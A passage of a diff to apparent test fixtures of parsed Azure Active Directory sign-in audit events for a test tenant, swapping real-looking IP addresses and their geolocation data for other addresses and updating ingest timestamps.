Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5059,25 +4399,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5091,7 +4413,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -5141,7 +4463,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5153,12 +4475,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051606500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970269500Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5197,25 +4519,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5229,7 +4533,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -5279,7 +4583,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5291,12 +4595,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051609400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970275200Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5335,25 +4639,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5367,7 +4653,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -5405,7 +4691,7 @@ }, "related": { "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -5417,12 +4703,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051612300Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970279Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5458,25 +4744,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5490,7 +4758,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -5541,7 +4809,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -5553,12 +4821,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051615600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970283500Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5597,22 +4865,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -5626,7 +4879,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -5676,7 +4929,7 @@ "asr" ], "ip": [ - "37.29.234.179" + "67.43.156.14" ] }, "organization": { @@ -5688,12 +4941,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051618500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970288400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5732,25 +4985,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5764,7 +4999,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -5814,7 +5049,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -5826,12 +5061,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051656900Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 